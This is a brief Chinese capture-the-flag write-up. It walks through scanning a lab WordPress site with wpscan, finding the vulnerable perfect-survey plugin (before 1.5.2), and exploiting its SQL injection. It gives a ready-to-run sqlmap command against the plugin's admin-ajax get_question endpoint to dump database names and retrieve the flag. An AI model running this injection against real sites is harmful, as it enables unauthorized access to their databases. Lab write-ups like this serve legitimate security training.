一看是个wordpress,看了下版本6.0没洞,直接扔wpscan扫一下
发现了个插件
一搜发现perfect-survey在1.5.2之前都有洞,直接搜exp打.
上官网找了个API重扫一遍,直接给出了CVE号!
直接找个sqlmap的exp跑一下,注意第二个位置选n来设置cookie
sqlmap -u "http://eci-2zeg18fce0yxpb7pebgq.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=get_question&question_id=1 *" --dbms=mysql --dbs
成功得到数据库名.最后在数据库中得到flag